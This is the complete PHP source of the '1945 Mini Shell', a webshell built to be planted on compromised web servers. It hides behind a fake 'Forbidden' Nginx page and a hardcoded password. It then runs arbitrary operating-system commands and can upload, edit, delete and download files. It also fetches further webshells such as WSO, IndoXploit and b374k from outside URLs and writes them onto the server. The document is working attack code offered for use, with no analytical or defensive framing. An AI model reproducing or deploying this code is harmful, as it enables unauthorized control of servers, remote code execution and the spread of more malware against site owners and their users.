1945 Mini Webshell

1. <?php
2. /*
3. @ PHPWebshell - 1945 Mini Shell.
4. @ c0ded by : shutdown57
5. @ Contact : indonesianpeople.shutdown57@gmail.com
6. */
7. error_reporting(0);
8. set_time_limit(0);
9. $passwordMiNi1945 = "1945mini";
10. $are=array("adminer"=>"https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php",
11.             "idx3"=>"https://raw.githubusercontent.com/alintamvanz/webshell/master/ext/indoxploit.php",
12.             "1945v2017"=>"https://raw.githubusercontent.com/alintamvanz/1945shell/master/ext/1945.php",
13.             "wso"=>"https://raw.githubusercontent.com/alintamvanz/webshell/master/ext/wso.php",
14.             "b374k"=>"https://raw.githubusercontent.com/alintamvanz/webshell/master/ext/b374k.php");
15.     if(isset($passwordMiNi1945)&&empty($_COOKIE[md5($_SERVER['HTTP_HOST'])]))
16.     {
17.         echo "<title>Forbidden</title><center><h1>Forbidden</h1><hr>Nginx 1.10.1</center>";
18.         if(isset($_GET['pass'])){
19.             if($_GET['pass']==$passwordMiNi1945){
20.                 setcookie(md5($_SERVER['HTTP_HOST']),md5($passwordMiNi1945));
21.                 echo "<meta http-equiv='refresh' content='0;url='>";
22.             }
23.         }
24.         exit();
25.     }
26. function getpath()
27. {
28.     if(isset($_GET['d']))
29.     {
30.         $d=$_GET['d'];
31.     }else{
32.         $d=getcwd();
33.     }
34.     return $d;
35. }
36. function cmd($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents();@ob_end_clean(); return $buff;   } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff;  } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff;    } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; }}
37. function delete($dir){if(is_dir($dir)){if(!rmdir($dir)){$s=scandir($dir);foreach ($s as $ss) {if(is_file($dir."/".$ss)){if(unlink($dir."/".$ss)){$rm=rmdir($dir);}}if(is_dir($dir."/".$ss)){$rm=rmdir($dir."/".$ss);$rm.=rmdir($dir);$rm.=system('rm -rf '.$dir);}}}}elseif(is_file($dir)){$rm = unlink($dir);if(!$rm){system('rm -rf '.$dir);}}return $rm;}
38. function getowner($path){if(function_exists('posix_getpwuid')) {$downer = @posix_getpwuid(fileowner($path));$downer = $downer['name'];} else {$downer = fileowner($path);}return $downer;}
39. function getgroup($path){if(function_exists('posix_getgrgid')) {$dgrp = @posix_getgrgid(filegroup($path));$dgrp = $dgrp['name'];} else { $dgrp = filegroup($path);}return $dgrp;}
40. function upload($a,$b){ if(function_exists('move_uploaded_file')){$upl = move_uploaded_file($a,$b);}elseif (function_exists('copy')) {  $upl = copy($a,$b);}return $upl; }function array_upload($file){ $file_ary = array(); $file_count = count($file['name']); $file_key = array_keys($file); for($i=0;$i<$file_count;$i++) { foreach($file_key as $val) { $file_ary[$i][$val] = $file[$val][$i]; } } return $file_ary;}
41. function sedirs($dir)
42. {
43.     if(function_exists('scandir'))
44.     {
45.         $s=scandir($dir);
46.         chdir($dir);
47.     }else{
48.         $s=system($dir);
49.     }
50.     return $s;
51. }
52. function getperms($files)
53. {
54.         if($s_m = @fileperms($files)){
55.         $s_p = 'u';
56.         if(($s_m & 0xC000) == 0xC000)$s_p = 's';
57.         elseif(($s_m & 0xA000) == 0xA000)$s_p = 'l';
58.         elseif(($s_m & 0x8000) == 0x8000)$s_p = '-';
59.         elseif(($s_m & 0x6000) == 0x6000)$s_p = 'b';
60.         elseif(($s_m & 0x4000) == 0x4000)$s_p = 'd';
61.         elseif(($s_m & 0x2000) == 0x2000)$s_p = 'c';
62.         elseif(($s_m & 0x1000) == 0x1000)$s_p = 'p';
63.         $s_p .= ($s_m & 00400)? 'r':'-';
64.         $s_p .= ($s_m & 00200)? 'w':'-';
65.         $s_p .= ($s_m & 00100)? 'x':'-';
66.         $s_p .= ($s_m & 00040)? 'r':'-';
67.         $s_p .= ($s_m & 00020)? 'w':'-';
68.         $s_p .= ($s_m & 00010)? 'x':'-';
69.         $s_p .= ($s_m & 00004)? 'r':'-';
70.         $s_p .= ($s_m & 00002)? 'w':'-';
71.         $s_p .= ($s_m & 00001)? 'x':'-';
72.         return $s_p;
73.     }
74.     else return "???????????";
75. }
76. function downloads($file)
77. {
78.     @ob_clean();
79.     header('Content-Description: File Transfer');
80.     header('Content-Type: application/octet-stream');
81.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
82.     header('Expires: 0');header('Cache-Control: must-revalidate');
83.     header('Pragma: public');
84.     header('Content-Length: ' . filesize($file));
85.     readfile($file);
86.     exit;
87. }
88. function viewfilefunc($file)
89. {
90.     echo "<center><h1> View : ".basename($file)."</h1>";
91.     echo "<textarea readonly>";
92.     echo htmlspecialchars(file_get_contents($file));
93.     echo "</textarea></center>";
94. }
95. function ts($s_s){
96.     if($s_s<=0) return 0;
97.     $s_w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
98.     $s_e = floor(log($s_s)/log(1024));
99.     return sprintf('%.2f '.$s_w[$s_e], ($s_s/pow(1024, floor($s_e))));
100. }
101. function getsize($s_f){
102.     $s_s = @filesize($s_f);
103.     if($s_s !== false){
104.         if($s_s<=0) return 0;
105.         return ts($s_s);
106.     }
107.     else return "???";
108. }
109. function kuchiyose($a,$b)
110. {
111.     $fgc=file_get_contents($a);
112.     $fp=fopen($b.".1945m1n1.php",'w');
113.     fwrite($fp,$fgc);
114.     fclose($fp);
115. }
116. function cekk($f){
117.     if(file_exists($f.".1945m1n1.php")){
118.         echo "<b>Request done ! <a href='$f.1945m1n1.php' target='_blank'>Click here</a>";
119.     }
120. }
121. function renamefunc($dir,$oldname){
122.     echo "<center><h1>Rename : ".$oldname."</h1><br><form method='POST' class='in'>oldname : <input type='text' value='$oldname' class='in' readonly>";
123.     echo "Newname : <input type='text' name='newname' value='newname' class='in'><input type='submit' value='>>' name='s'></form></center>";
124.     if(isset($_POST['s'])){
125.         rename($dir."/".$oldname,$dir."/".$_POST['newname']);
126.         echo "<meta http-equiv='refresh' content='0;url=?d=".dirname($dir)."'>";
127.     }
128. }
129. function editfunc($dir,$file){
130.     echo "<center><h1> Edit : ".$file."</h1><br><form method='POST'>";
131.     echo "<textarea name='editfile'>".htmlspecialchars(file_get_contents($dir."/".$file))."</textarea><br>";
132.     echo "<input type='submit' name='sbmt' value='simpan !' style='width:200px;'>";
133.     echo "</form>";
134.     if(isset($_POST['sbmt']))
135.     {
136.         $fp=fopen($dir."/".$file,'w');
137.         fwrite($fp,$_POST['editfile']);
138.         fclose($fp);
139.         echo "<br><b>Tersimpan @".date('D ,d m Y')."</b><br>";
140.     }
141. }
142. function berinamafunc($dir){
143.     echo "<center><h1>New file </h1><br><form method='POST' class='in'>";
144.     echo "Filename : <input type='text' name='filename' value='newfile.php'>";
145.     echo "<input type='submit' name='svi' value='>>'>";
146.     echo "</form>";
147.     if(isset($_POST['svi']))
148.     {
149.         if(function_exists('touch')){
150.             touch($dir."/".$_POST['filename']);
151.         }else{
152.             $fp=fopen($dir."/".$_POST['filename'],'w');
153.             fwrite($fp,'#new file 1945');
154.             fclose($fp);
155.         }
156.         header('location:?d='.$dir.'&a=edit&f='.$_POST['filename']);
157.     }
158. }
159. function mkdirfunc($dir){
160.     echo "<center><h1>New directory</h1>";
161.     echo "<form method='POST' class='in'>New dir:<input type='text' name='mkdir'>";
162.     echo "<input type='submit' name='sbmt' value='>>'></form></center>";
163.     if(isset($_POST['sbmt']))
164.     {
165.         mkdir($dir."/".$_POST['mkdir']);
166.         echo "<meta http-equiv='refresh' content='0;url=?d=".$dir."'>";
167.     }
168.  
169. }
170. $gp=getpath();
171. ?>
172. <!DOCTYPE html>
173. <html>
174. <head>
175.     <title>1945 Mini Shell</title>
176. <meta name="author" content="shutdown57">
177. <link rel="icon" type="text/css" href="https://raw.githubusercontent.com/alintamvanz/alintamvanz.github.io/master/images/favicon_1945.gif">
178. </head>
179. <style type="text/css">
180.     body{background:#333;color:#eee}
181.     .table{border: 1px solid #00e4ff;width:800px;border-collapse: collapse;}
182.     .table tr{border-bottom: 1px solid #fff}a{text-decoration: none;color:#eee;}a:hover{color: #00e4ff}.table tr:hover{background:#666}hr{border: 1px solid #00e4ff}.in{display: inline-block;}select,option,input,textarea{background:#333;color:#eee;border: 1px solid #00e4ff}textarea{width:700px;height: 500px;margin: 0 auto;}
183. </style>
184. <body>
185. <center>
186. <a href="?"><h1>1945 Mini Shell</h1></a>
187. </center>
188. <hr><div class="in">
189. <form class="in" method="get">Kuchiyose no jutsu :
190.     <select name="a">
191.         <option value="">Kuchiyose</option>
192.         <option value="wso">WSO 2.5</option><option value="idx3">IndoXploit v3</option><option value="1945v2017">1945v2017</option><option value="b374k">b374k 2.8</option><option value="adminer">Adminer</option>
193.     </select><input type="submit" value=">>">
194. </form>
195. <form method="post" class="in" enctype="multipart/form-data" action="?d=<?=$gp;?>&a=upload"> Upload file :<input type="file" name="filup[]" multiple="" style="border: 0"><input type="submit" name="upload" value=">>"></form><form method="post" action="?d=<?=$gp;?>&a=cmd" class="in"> Command : <input type="text" name="cmd"><input type="submit" value=">>"></form>
196. <form method=get class="in">go to dir : <input type="text" name="d" value="<?=$gp;?>"><input type="submit" value=">>"></form><form method="get" class="in">Act? : <select name="a"><option value="logout">LogOut</option><option value="kill">Kill Self</option><option value="shell">Shell</option></select><input type="submit" value=">>"></form>
197. </div>
198. <hr>
199. <?php
200. if(empty($_GET['a']))
201. {
202.     ?>
203. <table align="center" class="table">
204.     <th>Files</th><th>Size</th><th>owner:group</th><th>Permission</th><th>Action</th>
205. <?php
206. $dir=sedirs(getpath());
207. echo "<tr><td><a href=\"?d=".dirname($gp)."\">Current dir</a></td><td>--</td><td>--</td><td>--</td><td align=right><a href='?d=$gp&a=touch'>Newfile</a> | <a href='?d=$gp&a=mkdir'>newdir</a></td></tr>";
208. foreach($dir as $d1)
209. {if(!is_dir("$gp/$d1")||$d1=="."||$d1=="..")continue;
210.     ?>
211.     <tr><td>[<a href="?d=<?="$gp/$d1"?>"><?=$d1;?></a>]</td>
212.     <td><?=getsize("$gp/$d1");?></td>
213.     <td><?=getowner("$gp/$f1");?>:<?=getgroup("$gp/$f1");?></td>
214.     <td><?=getperms("$gp/$d1");?></td>
215.     <td align="right"><a href="?d=<?="$gp/$d1"?>&a=rename">rename</a> | <a href="?d=<?="$gp/$d1"?>&a=delete">delete</a></td>
216.     </tr>
217.     <?php
218. }
219. foreach($dir as $f1)
220. {
221.     if(!is_file("$gp/$f1")||$f1=="."||$f1=="..")continue;
222. ?>
223.     <tr><td><a href="?d=<?=$gp;?>&a=view&f=<?=$f1;?>"><?=$f1;?></a></td>
224.     <td><?=getsize("$gp/$f1");?></td>
225.     <td><?=getowner("$gp/$f1");?>:<?=getgroup("$gp/$f1");?></td>
226.     <td><?=getperms("$gp/$f1");?></td>
227.     <td align="right">
228.     <a href="?d=<?=$gp;?>&a=rename&f=<?=$f1;?>">rename</a> |
229.     <a href="?d=<?="$gp/$f1";?>&a=delete">delete</a> |
230.     <a href="?d=<?=$gp;?>&a=edit&f=<?=$f1;?>">edit</a> |
231.     <a href="?d=<?=$gp;?>&a=download&f=<?=$f1;?>">download</a></td>
232.     </tr>
233.     <?php
234. }
235. ?>
236. </table>
237. <?php
238. }else{
239. @$a=$_GET['a'];
240. @$f=$_GET['f'];
241. @$d=$_GET['d'];
242. if($a=="view")
243. {viewfilefunc($d."/".$f);}elseif($a=="download"){downloads($d."/".$f);}
244. elseif($a=="logout"){if(setcookie(md5($_SERVER['HTTP_HOST']),""))
245.     echo "<script>alert('See You Next time !');window.location.href='????'</script>";}
246. elseif($a=="cmd"){
247.     echo "<center><h1> Command</h1></center>";
248.     ?><form method="post" action="?d=<?=$gp;?>&a=cmd" class="in"> Command : <input type="text" name="cmd"><input type="submit" value=">>"></form><?php
249.     echo "<pre>".cmd($_POST['cmd'])."</pre>";
250. }
251. elseif($a=="rename"){$ff=(isset($_GET['f']) ? $_GET['f'] : basename($_GET['d']));$gdd=(isset($_GET['f'])) ? $_GET['d'] : dirname($_GET['d']); renamefunc($gdd,$ff);}
252. elseif($a=="delete"){delete($_GET['d']);echo "<meta http-equiv='refresh' content='0;url=?d=".dirname($_GET['d'])."'>";}
253. elseif($a=="upload"){
254.     $fil=array_upload($_FILES['filup']); foreach($fil as $filup)
255.     {
256.         $filoc=$d."/".$filup['name'];
257.         if(upload($filup['tmp_name'],$filoc))
258.         {
259.             echo "<font color=lime>Successfully upload -> <a href='?d=".$d."&a=view&f=".$filup['name']."'>".$filoc."</a></font><br>";
260.         }else{
261.             echo "<font color=red>Failed upload -> ".$filoc."</font><br>";
262.         }
263.     }
264. }
265. elseif($a=="mkdir"){mkdirfunc($d);}
266. elseif($a=="touch"){berinamafunc($d);}
267. elseif($a=="edit"){editfunc($_GET['d'],$_GET['f']);}
268. elseif($a=="idx3"){kuchiyose($are['idx3'],"indoxploit");cekk("indoxploit");}
269. elseif($a=="wso"){kuchiyose($are['wso'],"wso");cekk("wso");}
270. elseif($a=="1945v2017"){kuchiyose($are['1945v2017'],"1945");cekk("1945");}
271. elseif($a=="adminer"){kuchiyose($are['adminer'],"adminer");cekk("adminer");}
272. elseif($a=="b374k"){kuchiyose($are['b374k'],"b374k");cekk("b374k");}
273. }
274. ?>
275. <footer style="bottom: 0;position: fixed;right: 0">copyright &copy; 2017 - Mini Shell by : shutdown57</footer>
276. </body>
277. </html>